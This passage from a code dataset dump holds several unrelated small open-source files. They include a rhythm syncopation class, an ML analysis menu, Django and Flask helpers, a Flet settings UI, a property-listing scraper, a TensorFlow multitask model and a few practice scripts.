model, track)\n\t\twith open(self.src) as f:\n\t\t\tself.values = json.load(f)\n\t\t#\n\t\tself.syncopation = [0 for _ in range(self.values['number_of_bars'])]\n\t\tfor n in (self.values)['bars_with_valid_output']:\n\t\t\tself.syncopation[n] = (self.values)['syncopation_by_bar'][n]\n\t\n\tdef syncopation_by_bar(self):\n\t\treturn self.syncopation\n\tdef syncopation_by_measure(self, measure=1):\n\t\treturn self.syncopation[measure-1]\n\tdef syncopation_by_measures(self, on_measure=1, off_measure=2):\n\t\tif on_measure <= 0:\n\t\t\ton_measure = 1\n\t\tif off_measure < 0:\n\t\t\toff_measure = len(self.syncopation)-off_measure\n\t\treturn self.syncopation[on_measure-1:off_measure]\n\tdef mean_per_bar(self):\n\t\treturn self.values['mean_syncopation_per_bar']\n\tdef feature(self, method=0):\n\t\tif method==0:\n\t\t\treturn [((self.syncopation)[i]-(self.syncopation)[i-1]) for i in range(1, len(self.syncopation))]\n\n","repo_name":"ginedoc/Rhythm-Distance","sub_path":"src/PhraseGroundtruth.py","file_name":"PhraseGroundtruth.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31471324692","text":"from core.constants import DATASET_LABEL_NAME, DATASET_TRAIN_RATIO, MENU_EXIT, MENU_RETURN, \\\n    SIGNIFICANT_FEATURE_SET_COUNTS\nfrom core.constants_feature_set import SIGNIFICANT_RIDGE_COLUMNS, SIGNIFICANT_BINARY_LABEL_COLUMNS, \\\n    SIGNIFICANT_FORWARD_STEPWISE_COLUMNS\nfrom core.data_analysis import perform_linear_regression_analysis, perform_polynomial_complexity_analysis, \\\n    perform_lasso_lambda_analysis, perform_ridge_lambda_analysis, perform_feature_correlation_analysis, \\\n    perform_svc_analysis\nfrom core.data_visualization import generate_classification_plots, \\\n    generate_scatter_plots, generate_histogram_plots, generate_compound_plots, generate_correlation_plots\nfrom core.loader import load_train_dataset, load_standardized_train_dataset, load_determining_dataset\nfrom core.model_exporter import handle_model_export\nfrom core.predict import predict_submission1_ridge, predict_submission1_propagation, predict_submission2, \\\n    predict_submission3, predict_submission4\nfrom core.preprocessing import split_training_test, split_claims_accept_reject, \\\n    separate_features_label, convert_label_binary, get_categorical_columns, expand_dataset_deterministic\nfrom library.option_input import OptionInput\n\n\ndef run_menu(title, options):\n    exit_menu = None\n    while exit_menu is None:\n        print(f'--- {title} ---')\n        option_input = OptionInput('Select option', options, lambda option: option[0])\n        _, option = option_input.get_input()\n        exit_menu = option()\n\n    return exit_menu\n\ndef run_dataset_menu():\n    return run_menu('Load dataset', [\n        ('Train dataset', load_train_dataset),\n        ('Train dataset - Standardized', load_standardized_train_dataset),\n    ])\n\ndef main():\n    dataset_raw = run_dataset_menu()\n\n    raw_features, raw_label = separate_features_label(dataset_raw, DATASET_LABEL_NAME)\n\n    categorical_columns = get_categorical_columns(raw_features)\n    dataset_expanded = expand_dataset_deterministic(dataset_raw, load_determining_dataset(), categorical_columns)\n\n    expanded_features, expanded_label = separate_features_label(dataset_expanded, DATASET_LABEL_NAME)\n\n    binary_label = convert_label_binary(expanded_label)\n\n    (accept_features, accept_label), (reject_features, reject_label) = split_claims_accept_reject(\n        expanded_features,\n        expanded_label\n    )\n\n    def run_dev_test():\n        # Intended for temporary 
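PhraseGroundtruth above encodes note positions as bar + beat/beats_per_bar with Fraction, so on/off arithmetic stays exact. The core idea in isolation:

```python
# A (bar, beat) pair maps to an exact rational position, so durations
# subtract cleanly with no floating-point drift.
from fractions import Fraction

beats_per_bar = 4
on = Fraction(2) + Fraction(1, beats_per_bar)   # bar 2, beat 1
off = Fraction(4) + Fraction(3, beats_per_bar)  # bar 4, beat 3
print(off - on)  # 5/2 bars
```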
development tests\n # Run whatever you want here\n pass\n\n def prediction_menu():\n run_menu('Model prediction menu', [\n ('Submission 1: Ridge', lambda: predict_submission1_ridge(dataset_raw)),\n ('Submission 1: Propagation', lambda: predict_submission1_propagation(dataset_raw)),\n ('Submission 2', lambda: predict_submission2(dataset_raw)),\n ('Submission 3', lambda: predict_submission3(dataset_raw)),\n ('Submission 4', lambda: predict_submission4(dataset_raw)),\n MENU_RETURN\n ])\n\n def analysis_menu(features, label):\n train_data, test_data = split_training_test(\n features,\n label,\n DATASET_TRAIN_RATIO\n )\n\n run_menu('Data analysis menu', [\n ('Perform feature correlation analysis', lambda: perform_feature_correlation_analysis(features)),\n ('Perform linear regression analysis', lambda: perform_linear_regression_analysis(train_data, test_data)),\n ('Perform polynomial complexity analysis', lambda: perform_polynomial_complexity_analysis(train_data, test_data)),\n ('Perform lasso lambda analysis', lambda: perform_lasso_lambda_analysis(train_data, test_data)),\n ('Perform ridge lambda analysis', lambda: perform_ridge_lambda_analysis(train_data, test_data)),\n ('Perform SVC penalty analysis', lambda: perform_svc_analysis(train_data, test_data)),\n MENU_RETURN\n ])\n\n def visualization_menu(features, label):\n print(features.columns)\n run_menu('Data visualization menu', [\n ('Generate scatter plots', lambda: generate_scatter_plots(features, label)),\n ('Generate histogram plots', lambda: generate_histogram_plots(features)),\n ('Generate compound plots', lambda: generate_compound_plots(features, label)),\n ('Generate correlation plots', lambda: generate_correlation_plots(features)),\n ('Generate classification plots', lambda: generate_classification_plots(features, label)),\n MENU_RETURN\n ])\n\n def featureset_menu(features, label, on_select):\n def select_features(features, label, feature_columns):\n return lambda: feature_count_menu(lambda count: on_select(\n features.loc[:, feature_columns[:count]],\n label\n ))\n\n def feature_count_menu(on_select):\n def get_option(count):\n return f'{count}', lambda: on_select(count)\n\n run_menu(\"Select feature set count\", [\n *[\n get_option(count) for count\n in SIGNIFICANT_FEATURE_SET_COUNTS\n ],\n MENU_RETURN,\n ])\n\n run_menu(\"Select feature set\", [\n ('All', lambda: on_select(features, label)),\n ('Significant: Ridge', select_features(features, label, SIGNIFICANT_RIDGE_COLUMNS)),\n ('Significant: Ridge binary label', select_features(features, label, SIGNIFICANT_BINARY_LABEL_COLUMNS)),\n ('Significant: Forward stepwise', select_features(features, label, SIGNIFICANT_FORWARD_STEPWISE_COLUMNS)),\n MENU_RETURN\n ])\n\n def data_selection_menu(title, on_select):\n def select_featureset(features, label):\n return lambda: featureset_menu(features, label, on_select)\n\n run_menu(title, [\n ('Expanded: Data', select_featureset(expanded_features, expanded_label)),\n ('Expanded: Binary label data', select_featureset(expanded_features, binary_label)),\n ('Expanded: Accepted claim data', select_featureset(accept_features, accept_label)),\n ('Expanded: Rejected claim data', select_featureset(reject_features, reject_label)),\n ('Raw: Data', lambda: on_select(raw_features, raw_label)),\n ('Raw: Binary label data', lambda: on_select(raw_features, binary_label)),\n ('Raw: Categorical', lambda: on_select(raw_features.loc[:, categorical_columns], raw_label)),\n MENU_RETURN\n ])\n\n def main_menu():\n run_menu('Main menu', [\n ('Run dev test', 
run_dev_test),\n ('Generate data visualization plots', lambda: (\n data_selection_menu('Select visualization data', visualization_menu)\n )),\n ('Perform data analysis', lambda: (\n data_selection_menu('Select analysis data', analysis_menu)\n )),\n ('Run model prediction', prediction_menu),\n ('Export competition model', handle_model_export),\n MENU_EXIT\n ])\n\n main_menu()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Samuel-collab2/mysterydata","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"32825465381","text":"# Custom user-defined exception\nclass CustomError(Exception):\n def __init__(self, message):\n self.message = message\n\n\n# Function demonstrating raising an exception\ndef divide_numbers(a, b):\n try:\n if b == 0:\n raise CustomError('Division by zero is not allowed')\n result = a / b\n except CustomError as e:\n print('Custom exception: ', e.message)\n\n except ZeroDivisionError:\n print('Error: Division by zero')\n else:\n print('Division successful. Result: ', result)\n finally:\n print('Division operation completed.')\n\n\n# Main block\ntry:\n # Example of raising exception and specific exception handling\n num1 = 10\n num2 = 2\n divide_numbers(num1, num2)\n\n # handling multiple exceptions\n num3 = 10\n num4 = 0\n divide_numbers(num3, num4)\n\nexcept CustomError as ce:\n print('Custom error handled within main block: ', ce.message)\nexcept ZeroDivisionError:\n print('Error: Division by zero')\nexcept Exception as ex:\n print('An unexpected error ocurred: ', ex)","repo_name":"luisAlcides/Learn_Python","sub_path":"intermediate/09_Exceptions/10_Practice.py","file_name":"10_Practice.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74089261838","text":"from django.urls import path, re_path\nfrom . 
import views\n\napp_name = 'blogpost'\nurlpatterns = [\n    path('create/', views.create_blog_view, name='create'),\n    path('<slug>/', views.detail_blog_view, name='detail'),\n    path('<slug>/update', views.update_blog_view, name='update'),\n    path('<slug>/delete/', views.delete_blog_view, name='delete'),\n    path('<slug>/favorite/', views.favorite_view, name='favorite'),\n\n]\n","repo_name":"BahaaIbrahim3024/Blog","sub_path":"blogPost/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8629743835","text":"from rich import print\nfrom rich.console import Console\n\nfrom or_globalvars import vars\n\nconsole = Console()\n# Possible starting dates\n\n# Weekday names array\nweekdays = [\n    \"SATURDAY\",\n    \"SUNDAY\",\n    \"MONDAY\",\n    \"TUESDAY\",\n    \"WEDNESDAY\",\n    \"THURSDAY\",\n    \"FRIDAY\",\n]\n\n\ndef get_date():\n    \"\"\"Determines which turn it is, creates a date based off turn #\n    Args:\n        turn_number (Month, Day): Sets possible dates\n    \"\"\"\n    return f\"{vars.dates[0]}, {vars.current_date}\"\n\n\ndef print_weekday(amount):\n    \"\"\"Function for determining day of the week\"\"\"\n    return weekdays[amount % 7]\n\n\ndef print_final_date(d3):\n    \"\"\"Determines final date based off origin\"\"\"\n    # mar 29 -> dec 20 1847 = 266 days\n    weekday = print_weekday(d3)\n    # dec 1 = 246 days\n    if d3 > 246:\n        return \"{} DECEMBER {} 1847\".format(weekday, d3 - 246)\n    elif d3 > 216:\n        return \"{} NOVEMBER {} 1847\".format(weekday, d3 - 216)\n    elif d3 > 185:\n        return \"{} OCTOBER {} 1847\".format(weekday, d3 - 185)\n    elif d3 > 155:\n        return \"{} SEPTEMBER {} 1847\".format(weekday, d3 - 155)\n    elif d3 > 125:\n        return \"{} AUGUST {} 1847\".format(weekday, d3 - 124)\n    else:\n        return \"{} JULY {} 1847\".format(weekday, d3 - 93)\n","repo_name":"JackMorash/RPG","sub_path":"or_dates.py","file_name":"or_dates.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4712331877","text":"import flet as ft\n\n\nclass SettingGmail(ft.UserControl):\n    def __init__(self, gmail: str):\n        \"\"\"設定タブのGmail欄のコンポーネント\n\n        Parameters\n        ----------\n        gmail : str\n            ストレージに保存されているgmailアドレス\n        \"\"\"\n        super().__init__()\n        self.gmail = ft.TextField(label=\"Gmail\", value=gmail)\n\n    def build(self):\n        return self.gmail\n\n    @property\n    def value(self):\n        return self.gmail.value\n\n    @value.setter\n    def value(self, value):\n        self.gmail.value = value\n\n\nclass SettingCredentialsPath(ft.UserControl):\n    def __init__(self, credentials_path):\n        \"\"\"設定タブの認証情報欄のためのコンポーネント\n\n        Parameters\n        ----------\n        credentials_path : str\n            認証情報が記述されているファイルのパス\n        on_click\n            コンポーネントのボタンをクリックした時実行する関数\n        \"\"\"\n        super().__init__()\n        self.selected_files = ft.TextField(label=\"認証情報\", value=credentials_path)\n        self.file_dialog = ft.FilePicker(on_result=self.pick_files_result)\n\n    def build(self):\n        return ft.Column(\n            [\n                self.selected_files,\n                ft.ElevatedButton(\n                    \"認証ファイルを選択\",\n                    icon=ft.icons.UPLOAD_FILE,\n                    on_click=lambda _: self.file_dialog.pick_files(),\n                    height=40,\n                    elevation=3,\n                ),\n            ]\n        )\n\n    def pick_files_result(self, e: ft.FilePickerResultEvent):\n        if not e.files:\n            return\n        self.value = e.files[0].path\n        self.update()\n\n    @property\n    def value(self):\n        return self.selected_files.value\n\n    @value.setter\n    def value(self, value):\n        self.selected_files.value = value\n\n\nclass SettingTab(ft.UserControl):\n    def __init__(self, setting_list: list, names: list, 
client_storage: ft.Page):\n \"\"\"設定タブコンポーネント\n\n Parameters\n ----------\n setting_list : list\n 設定タブに表示するコンポーネントのリスト\n add_settings\n 設定を適用する時用の関数\n \"\"\"\n super().__init__()\n self.setting_list = setting_list\n self.names = names\n self.client_storage = client_storage\n\n def set_storage(self, e):\n if self.client_storage is not None:\n for name, setting in zip(self.names, self.setting_list):\n self.client_storage.set(name, setting.value)\n\n def add_setting(self, e):\n self.button.text = \"登録しました\"\n self.button.icon = \"check\"\n self.update()\n self.set_storage(e)\n\n def default(self, e):\n if e.data:\n self.button.text = \"情報を登録\"\n self.button.icon = \"save\"\n self.update()\n\n def build(self):\n self.button = ft.ElevatedButton(\n \"情報を登録\",\n icon=\"save\",\n on_click=self.add_setting,\n on_hover=self.default,\n height=50,\n width=200,\n style=ft.ButtonStyle(\n color={\n ft.MaterialState.DEFAULT: ft.colors.WHITE,\n },\n bgcolor={\n ft.MaterialState.DEFAULT: ft.colors.BLUE_700,\n ft.MaterialState.HOVERED: ft.colors.BLUE_900,\n },\n shape=ft.RoundedRectangleBorder(radius=20),\n ),\n )\n return ft.Column(\n [\n *[\n ft.Container(setting, margin=ft.margin.only(bottom=30))\n for setting in self.setting_list\n ],\n self.button,\n ]\n )\n","repo_name":"KubotaDaiki/lecture-sync","sub_path":"src/component/setting_tab.py","file_name":"setting_tab.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4731530327","text":"import re\n\nfrom flask import request\n\n\ndef get_filter_query():\n filter = {}\n\n for field in request.args.to_dict():\n match = re.match('filters\\[(.*)\\]', field)\n if match is not None:\n filter[match.group(1)] = request.args.get(field)\n\n match = re.match('filters\\[(.*)\\]\\[(.*)\\]', field)\n if match is not None:\n filter[match.group(1)][match.group(2)] = request.args.get(field)\n\n return filter\n\n\ndef parse_multi_form(form):\n data = {}\n for url_k in form:\n v = form[url_k]\n ks = []\n while url_k:\n if '[' in url_k:\n k, r = url_k.split('[', 1)\n ks.append(k)\n if r[0] == ']':\n ks.append('')\n url_k = r.replace(']', '', 1)\n else:\n ks.append(url_k)\n break\n sub_data = data\n for i, k in enumerate(ks):\n if k.isdigit():\n k = int(k)\n if i + 1 < len(ks):\n if not isinstance(sub_data, dict):\n break\n if k in sub_data:\n sub_data = sub_data[k]\n else:\n sub_data[k] = {}\n sub_data = sub_data[k]\n else:\n if isinstance(sub_data, dict):\n sub_data[k] = v\n return data\n","repo_name":"vortexgin/simple-python-sqlite","sub_path":"helper/HttpHelper.py","file_name":"HttpHelper.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25492568515","text":"from datetime import datetime\r\nimport asyncio\r\n\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import WebDriverException\r\nfrom tinydb import Query\r\n\r\nfrom alarm import sound_alarm\r\n\r\n# Define the format for the timestamp\r\ntimestamp_format = '%Y%m%d %H:%M:%S'\r\n\r\n\r\ndef scrape(webdriver, search_address, database, chat_id):\r\n # Open the provided search address in the WebDriver\r\n webdriver.get(search_address)\r\n\r\n # Find the result list element using its XPath\r\n result_list_xpath = '//*[@id=\"cope_ref\"]/section[2]/ol'\r\n result_list = webdriver.find_element(By.XPATH, result_list_xpath)\r\n\r\n # Retrieve all the individual result items from the result 
list\r\n results = result_list.find_elements(By.CSS_SELECTOR, 'li')\r\n\r\n # Initialize a counter to keep track of added listings\r\n added_listings = 0\r\n\r\n for result in results:\r\n # Filter out ads\r\n if result.get_attribute(\"class\") != \"J04SL w-full\":\r\n continue\r\n attempts = 0\r\n\r\n # Initialize a dictionary to store the listing details\r\n property_listing = {\r\n 'link': '',\r\n 'price': '',\r\n 'address': '',\r\n 'type': ''\r\n }\r\n\r\n # Initialize variables to track errors during scraping\r\n errors = \"\"\r\n error_occurred = False\r\n\r\n while attempts < 2:\r\n error_occurred = False\r\n\r\n try:\r\n # Retrieve the link element for the property listing\r\n link = result.find_element(By.CSS_SELECTOR, 'a')\r\n property_listing['link'] = link.get_property(\"href\")\r\n except WebDriverException as e:\r\n errors += e.msg + '\\n'\r\n error_occurred = True\r\n\r\n try:\r\n # Retrieve the information container for the property listing\r\n info = result.find_element(By.XPATH, './a/section/section[1]/ul')\r\n except WebDriverException as e:\r\n errors += e.msg + '\\n'\r\n error_occurred = True\r\n else:\r\n try:\r\n info_elements = info.find_elements(By.CSS_SELECTOR, 'li')\r\n # Retrieve the price information for the property listing\r\n price = info_elements.pop(-1)\r\n property_listing['price'] = price.text.replace('\\u20ac', '')\r\n for info_element in info_elements:\r\n property_listing['type'] += info_element.text + ' | '\r\n except WebDriverException as e:\r\n errors += e.msg + '\\n'\r\n error_occurred = True\r\n\r\n try:\r\n # Retrieve the address information for the property listing\r\n address = result.find_element(By.CSS_SELECTOR, 'address')\r\n property_listing['address'] = address.text\r\n except WebDriverException as e:\r\n errors += e.msg + '\\n'\r\n error_occurred = True\r\n\r\n if not error_occurred:\r\n break\r\n\r\n attempts += 1\r\n\r\n # Add the timestamp to the property listing\r\n property_listing['time'] = datetime.now().strftime(timestamp_format)\r\n\r\n entries = Query()\r\n\r\n if error_occurred:\r\n # Print any errors that occurred during scraping\r\n print(errors)\r\n elif not database.contains(entries.link == property_listing['link']):\r\n # Insert the property listing into the database if it's not a duplicate\r\n database.insert(property_listing)\r\n added_listings += 1\r\n\r\n # Run the sound_alarm function asynchronously to trigger a notification\r\n asyncio.run(sound_alarm(property_listing, chat_id))\r\n\r\n # Print the number of added listings after the scraping is complete\r\n print(\"Added \" + str(added_listings) + \" listings\")\r\n","repo_name":"Turtarbot/Property_Alarm","sub_path":"immoscout_at_scraper.py","file_name":"immoscout_at_scraper.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"33654848879","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom model import encoder\nfrom model import shared_inputs\n\n\nclass Inference(object):\n def __init__(self, config, inputs, pretrained_embeddings, tasks):\n with tf.variable_scope('encoder'):\n self.encoder = encoder.Encoder(config, inputs, pretrained_embeddings)\n self.modules = {}\n for task in tasks:\n with tf.variable_scope(task.name):\n self.modules[task.name] = task.get_module(inputs, self.encoder)\n\n\nclass Model(object):\n def __init__(self, config, pretrained_embeddings, 
tasks):\n self._config = config\n self._tasks = tasks\n\n self._global_step, self._optimizer = self._get_optimizer()\n self._inputs = shared_inputs.Inputs(config)\n with tf.variable_scope('model', reuse=tf.AUTO_REUSE) as scope:\n inference = Inference(config, self._inputs, pretrained_embeddings,\n tasks)\n self._trainer = inference\n self._tester = inference\n self._teacher = inference\n if config.ema_test or config.ema_teacher:\n ema = tf.train.ExponentialMovingAverage(config.ema_decay)\n model_vars = tf.get_collection(\"trainable_variables\", \"model\")\n ema_op = ema.apply(model_vars)\n tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, ema_op)\n\n def ema_getter(getter, name, *args, **kwargs):\n var = getter(name, *args, **kwargs)\n return ema.average(var)\n\n scope.set_custom_getter(ema_getter)\n inference_ema = Inference(\n config, self._inputs, pretrained_embeddings, tasks)\n if config.ema_teacher:\n self._teacher = inference_ema\n if config.ema_test:\n self._tester = inference_ema\n\n self._unlabeled_loss = self._get_consistency_loss(tasks)\n self._unlabeled_train_op = self._get_train_op(self._unlabeled_loss)\n self._labeled_train_ops = {}\n for task in self._tasks:\n task_loss = self._trainer.modules[task.name].supervised_loss\n self._labeled_train_ops[task.name] = self._get_train_op(task_loss)\n\n def _get_consistency_loss(self, tasks):\n return sum([self._trainer.modules[task.name].unsupervised_loss\n for task in tasks])\n\n def _get_optimizer(self):\n global_step = tf.get_variable('global_step', initializer=0, trainable=False)\n warm_up_multiplier = (tf.minimum(tf.to_float(global_step),\n self._config.warm_up_steps)\n / self._config.warm_up_steps)\n decay_multiplier = 1.0 / (1 + self._config.lr_decay *\n tf.sqrt(tf.to_float(global_step)))\n lr = self._config.lr * warm_up_multiplier * decay_multiplier\n optimizer = tf.train.MomentumOptimizer(lr, self._config.momentum)\n return global_step, optimizer\n\n def _get_train_op(self, loss):\n grads, vs = zip(*self._optimizer.compute_gradients(loss))\n grads, _ = tf.clip_by_global_norm(grads, self._config.grad_clip)\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n return self._optimizer.apply_gradients(\n zip(grads, vs), global_step=self._global_step)\n\n def _create_feed_dict(self, mb, model, is_training=True):\n feed = self._inputs.create_feed_dict(mb, is_training)\n if mb.task_name in model.modules:\n model.modules[mb.task_name].update_feed_dict(feed, mb)\n else:\n for module in model.modules.values():\n module.update_feed_dict(feed, mb)\n return feed\n\n def train_unlabeled(self, sess, mb):\n return sess.run([self._unlabeled_train_op, self._unlabeled_loss],\n feed_dict=self._create_feed_dict(mb, self._trainer))[1]\n\n def train_labeled(self, sess, mb):\n return sess.run([self._labeled_train_ops[mb.task_name],\n self._trainer.modules[mb.task_name].supervised_loss,],\n feed_dict=self._create_feed_dict(mb, self._trainer))[1]\n\n def run_teacher(self, sess, mb):\n result = sess.run({task.name: self._teacher.modules[task.name].probs\n for task in self._tasks},\n feed_dict=self._create_feed_dict(mb, self._teacher,\n False))\n for task_name, probs in result.iteritems():\n mb.teacher_predictions[task_name] = probs.astype('float16')\n\n def test(self, sess, mb):\n return sess.run(\n [self._tester.modules[mb.task_name].supervised_loss,\n self._tester.modules[mb.task_name].preds],\n feed_dict=self._create_feed_dict(mb, self._tester, False))\n\n def get_global_step(self, sess):\n return 
sess.run(self._global_step)\n","repo_name":"tensorflow/models","sub_path":"research/cvt_text/model/multitask_model.py","file_name":"multitask_model.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":76227,"dataset":"github-code","pt":"29"} +{"seq_id":"32945805229","text":"from datetime import datetime\n\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic import ListView, FormView, CreateView\n\nfrom cleanup.models import DeleteFile\nfrom position_rec.forms import AccountFundPositionRecForm, PositionRecAttachmentsForm\nfrom position_rec.models import AccountFundPositionRec, PositionRecAttachments\n\n\nclass AccountFundPositionRecView(FormView):\n template_name = \"create_account.html\"\n form_class = AccountFundPositionRecForm\n success_url = '#'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n queryset = AccountFundPositionRec.objects.all()\n context['account_list'] = queryset\n return context\n\n def form_valid(self, form):\n data = form.cleaned_data\n account_id_to_edit = self.request.POST.get('account_id_to_edit')\n third_party = data.get('third_party')\n account_no = data.get('account_no')\n mnemonic = data.get('mnemonic')\n type = data.get('type')\n fund = data.get('fund')\n excluded = data.get('excluded')\n date_updated = datetime.now()\n create_new_account = False if account_id_to_edit else True\n if not create_new_account:\n try:\n account_obj = AccountFundPositionRec.objects.get(id=account_id_to_edit)\n account_obj.third_party = third_party\n account_obj.account_no = account_no\n account_obj.mnemonic = mnemonic\n account_obj.type = type\n account_obj.fund = fund\n account_obj.excluded = excluded\n account_obj.date_updated = date_updated\n account_obj.save()\n create_new_account = False\n except AccountFundPositionRec.DoesNotExist:\n create_new_account = True\n if create_new_account:\n AccountFundPositionRec.objects.create(third_party=third_party, account_no=account_no,\n mnemonic=mnemonic, type=type, fund=fund, excluded=excluded,\n date_updated=date_updated)\n return super(AccountFundPositionRecView, self).form_valid(form)\n\n\ndef get_account_details(request):\n \"\"\" Retreives all the details for the requested Account \"\"\"\n if request.method == 'POST':\n account_id = request.POST['account_id']\n account_details = {}\n try:\n account = AccountFundPositionRec.objects.get(id=account_id)\n account_details['third_party'] = account.third_party\n account_details['account_no'] = account.account_no\n account_details['mnemonic'] = account.mnemonic\n account_details['type'] = account.type\n account_details['fund'] = account.fund\n account_details['excluded'] = account.excluded\n except AccountFundPositionRec.DoesNotExist:\n account_details = []\n\n return JsonResponse({'account_details': account_details})\n\n\ndef delete_account(request):\n response = None\n if request.method == 'POST':\n # Take the ID and Delete\n id_to_delete = request.POST['id']\n AccountFundPositionRec.objects.get(id=id_to_delete).delete()\n response = 'account_deleted'\n\n return HttpResponse(response)\n\n\nclass PositionRecAttachmentsView(FormView):\n template_name = 'file_upload.html'\n form_class = PositionRecAttachmentsForm\n success_url = '#'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n queryset = PositionRecAttachments.objects.all()\n 
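# --- editor's sketch, not part of the dataset records (assumes stock Django ORM) ---
# AccountFundPositionRecView.form_valid() above hand-rolls an upsert with a
# try/except around .get(); Django's update_or_create() expresses the same
# create-or-update branching in one call:
#
#     obj, created = AccountFundPositionRec.objects.update_or_create(
#         id=account_id_to_edit or None,  # None -> no match, falls through to create()
#         defaults={
#             'third_party': third_party, 'account_no': account_no,
#             'mnemonic': mnemonic, 'type': type, 'fund': fund,
#             'excluded': excluded, 'date_updated': datetime.now(),
#         },
#     )
# --- end sketch ---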
context['uploaded_file_list'] = queryset\n return context\n\n def form_valid(self, form):\n data = form.cleaned_data\n original_filename = 'filename'\n position_rec_attachment = data.get('position_rec_attachment')\n if isinstance(position_rec_attachment, InMemoryUploadedFile):\n original_filename = position_rec_attachment._name\n description = data.get('description')\n uploaded_by = data.get('uploaded_by')\n uploaded_on = datetime.now().date()\n PositionRecAttachments.objects.create(position_rec_attachment=position_rec_attachment,\n original_filename=original_filename, description=description,\n uploaded_by=uploaded_by, uploaded_on=uploaded_on)\n return super(PositionRecAttachmentsView, self).form_valid(form)\n\n\ndef delete_ops_file(request):\n response = None\n if request.method == 'POST':\n try:\n id_to_delete = request.POST['id']\n file_object = PositionRecAttachments.objects.get(id=id_to_delete)\n file_field = file_object.position_rec_attachment\n file_object.delete()\n response = 'file_deleted'\n DeleteFile(file_details=file_field, aws_file_key=file_field.file.obj.key,\n aws_bucket=file_field.file.obj.bucket_name, requested_delete_at=datetime.now()).save()\n except Exception as error:\n response = 'Error'\n print('ERROR', error)\n return HttpResponse(response)\n \n","repo_name":"johndpope/WaterIsland_RiskPortal","sub_path":"position_rec/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9477287673","text":"from Ex113 import *\n\ncores = ('\\033[m', # 0 -> limpa\n '\\033[1;31m', # 1 -> Vermelho\n '\\033[1;36m', # 2 -> Azul\n '\\033[1;32m', # 3 -> Verde\n '\\033[1m', # 4 -> Negrito\n '\\033[1;33m', # 5 -> Amarelo\n )\n\n\ndef linha(t=42):\n print(f'{cores[4]}-{cores[0]}'*(t))\n\n\ndef tit(txt):\n linha()\n print(f'{cores[3]}{txt.center(42)}{cores[0]}')\n linha()\n\n\ndef theMenu(lista):\n tit('MENU PRINCIPAL')\n c = 1\n for i in lista:\n print(f'{cores[5]}{c}{cores[0]} - {cores[2]}{i}{cores[0]}')\n c += 1\n linha()\n opc = isInt(f'{cores[5]}Sua Opção:{cores[3]} ')\n print(cores[0])\n return opc\n","repo_name":"genesonio/python","sub_path":"Nova pasta/Exercíciosfinais/Ex115/interface/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43195767862","text":"#!/bin/python3\n\nimport sys\n\n\ndef diagonal_diff(a):\n x, y = 0, 0\n ix, iy = 0, len(a)-1\n for l in a:\n x += l[ix]\n y += l[iy]\n if ix < len(a) and iy >= 0:\n ix += 1\n iy -= 1\n\n return abs(x - y)\n\nn = int(input().strip())\na = []\nfor a_i in range(n):\n a_t = [int(a_temp) for a_temp in input().strip().split(' ')]\n a.append(a_t)\n\n# print(a)\n\nprint(diagonal_diff(a))\n","repo_name":"teoyenmao/leet_python","sub_path":"diagonal_diff.py","file_name":"diagonal_diff.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71013176078","text":"import pandas as pd\r\nimport warnings\r\nfrom pandas.core.common import SettingWithCopyWarning\r\nimport plotly.graph_objects as go\r\nimport plotly.io as pio\r\n\r\npio.renderers.default='browser'\r\nwarnings.simplefilter(action=\"ignore\", category=SettingWithCopyWarning)\r\n\r\n# Declaring functions ------------------------------------\r\ndef buy(amount, buyAmount, stocks):\r\n value = 0\r\n while (value <= 
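# --- editor's note, not part of the dataset records ---
# The buy() loop this comment interrupts is an iterative floor division;
# with numeric inputs it is effectively
#
#     n = int(amount // buyAmount)
#     stocks += n
#     amount -= n * buyAmount
#
# which buys the same share count without looping once per share.
# --- end note ---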
